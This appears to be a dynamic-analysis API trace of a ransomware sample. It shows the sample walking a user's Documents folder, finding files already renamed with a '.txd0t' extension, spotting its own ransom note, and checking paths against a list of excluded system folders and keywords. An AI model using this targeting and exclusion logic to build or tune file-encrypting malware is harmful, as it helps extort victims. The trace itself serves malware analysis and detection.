StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2="..") returned 1 [0090.108] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.108] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.117] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="MRcnfzewVmw.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t" [0090.118] PathFindExtensionW (pszPath="MRcnfzewVmw.docx.txd0t") returned=".txd0t" [0090.119] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.119] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0090.120] StrCmpW (psz1="My Music", psz2=".") returned 1 [0090.120] StrCmpW (psz1="My Music", psz2="..") returned 1 [0090.120] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0090.120] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0090.120] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0090.121] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0090.121] StrCmpW (psz1="My Shapes", psz2=".") returned 1 [0090.121] StrCmpW (psz1="My Shapes", psz2="..") returned 1 [0090.121] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0090.121] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0090.121] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0090.121] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4069f0, ftCreationTime.dwHighDateTime=0x1d5f0c3, ftLastAccessTime.dwLowDateTime=0x5d35a670, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x256f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NUZN31jJgT6UykF_.ots.txd0t", cAlternateFileName="NUZN31~1.TXD")) returned 1 [0090.121] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2=".") returned 1 [0090.121] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2="..") returned 1 [0090.121] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="NUZN31jJgT6UykF_.ots.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t" [0090.122] PathFindExtensionW (pszPath="NUZN31jJgT6UykF_.ots.txd0t") returned=".txd0t" [0090.122] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.122] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0090.122] StrCmpW (psz1="Outlook Files", psz2=".") returned 1 [0090.122] StrCmpW (psz1="Outlook Files", psz2="..") returned 1 [0090.122] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Outlook Files", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system32\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\local\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\boot\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\perflogs\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\programdata\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\drivers\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\wsus\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="crypt_detect") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="cryptolocker") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="ransomware") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\WINDOWS") returned 0x0 [0090.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files") returned 0x0 [0090.123] GetProcessHeap () returned 0xe30000 [0090.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xec7a60 [0090.123] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0090.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*" [0090.123] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.123] StrCmpW (psz1=".", psz2=".") returned 0 [0090.123] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.124] StrCmpW (psz1="..", psz2=".") returned 1 [0090.124] StrCmpW (psz1="..", psz2="..") returned 0 [0090.124] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x516d0a53, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x516d0a53, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5171c524, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.124] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.124] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.124] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0090.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0090.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt" [0090.124] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.124] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.124] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.124] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 1 [0090.124] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2=".") returned 1 [0090.124] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2="..") returned 1 [0090.124] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0090.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0090.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="kkcie@kdj.kd.pst.txd0t", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t" [0090.124] PathFindExtensionW (pszPath="kkcie@kdj.kd.pst.txd0t") returned=".txd0t" [0090.124] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.124] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 0 [0090.125] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.125] GetProcessHeap () returned 0xe30000 [0090.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a60 | out: hHeap=0xe30000) returned 1 [0090.128] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a10cb0, ftCreationTime.dwHighDateTime=0x1d5b064, ftLastAccessTime.dwLowDateTime=0x8f772f70, ftLastAccessTime.dwHighDateTime=0x1d5c4c2, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7d58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQnuWmakq.docx.txd0t", cAlternateFileName="QQNUWM~1.TXD")) returned 1 [0090.128] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2=".") returned 1 [0090.128] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2="..") returned 1 [0090.128] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="QQnuWmakq.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t" [0090.128] PathFindExtensionW (pszPath="QQnuWmakq.docx.txd0t") returned=".txd0t" [0090.128] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.128] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e473b0, ftCreationTime.dwHighDateTime=0x1d5f07a, ftLastAccessTime.dwLowDateTime=0xe5de8050, ftLastAccessTime.dwHighDateTime=0x1d58ea5, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quCysrsmVF.pptx.txd0t", cAlternateFileName="QUCYSR~1.TXD")) returned 1 [0090.128] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2=".") returned 1 [0090.128] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2="..") returned 1 [0090.128] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="quCysrsmVF.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t" [0090.128] PathFindExtensionW (pszPath="quCysrsmVF.pptx.txd0t") returned=".txd0t" [0090.128] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.128] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab726a00, ftCreationTime.dwHighDateTime=0x1d5ef97, ftLastAccessTime.dwLowDateTime=0x2fc4f790, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0x516d0a53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x119cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sA2u-LPe-LiGoMos.pdf.txd0t", cAlternateFileName="SA2U-L~1.TXD")) returned 1 [0090.128] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2=".") returned 1 [0090.128] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2="..") returned 1 [0090.128] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="sA2u-LPe-LiGoMos.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t" [0090.128] PathFindExtensionW (pszPath="sA2u-LPe-LiGoMos.pdf.txd0t") returned=".txd0t" [0090.128] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.128] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd450c0, ftCreationTime.dwHighDateTime=0x1d5ea9b, ftLastAccessTime.dwLowDateTime=0xb5159f50, ftLastAccessTime.dwHighDateTime=0x1d5f00a, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcf06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spmR iwVLu JE 9B.rtf.txd0t", cAlternateFileName="SPMRIW~1.TXD")) returned 1 [0090.129] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2=".") returned 1 [0090.129] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2="..") returned 1 [0090.129] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="spmR iwVLu JE 9B.rtf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t" [0090.129] PathFindExtensionW (pszPath="spmR iwVLu JE 9B.rtf.txd0t") returned=".txd0t" [0090.129] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.129] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71682a0, ftCreationTime.dwHighDateTime=0x1d5e783, ftLastAccessTime.dwLowDateTime=0x4ecffce0, ftLastAccessTime.dwHighDateTime=0x1d5e1c8, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf00c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U8_NH2Y.pdf.txd0t", cAlternateFileName="U8_NH2~1.TXD")) returned 1 [0090.129] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2=".") returned 1 [0090.129] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2="..") returned 1 [0090.129] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="U8_NH2Y.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t" [0090.129] PathFindExtensionW (pszPath="U8_NH2Y.pdf.txd0t") returned=".txd0t" [0090.129] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.129] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e48d30, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x94f1d180, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xedec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cAlternateFileName="UGOWYR~1.TXD")) returned 1 [0090.129] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2=".") returned 1 [0090.129] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2="..") returned 1 [0090.129] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t" [0090.129] PathFindExtensionW (pszPath="UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned=".txd0t" [0090.129] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.129] FindNextFileW (in: hFindFile=0xec2630, 